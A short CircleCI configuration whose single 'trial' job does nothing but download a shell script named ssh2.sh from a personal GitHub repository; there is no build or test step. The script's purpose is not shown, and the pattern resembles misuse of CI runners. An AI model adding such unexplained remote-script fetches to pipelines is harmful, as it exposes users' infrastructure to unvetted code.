version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 1
      steps:
        - run:
            Wget https://raw.githubusercontent.com/lijari/Testssh/main/ssh2.sh

workflows:
    version: 2.1
    build:
        jobs:
        - trial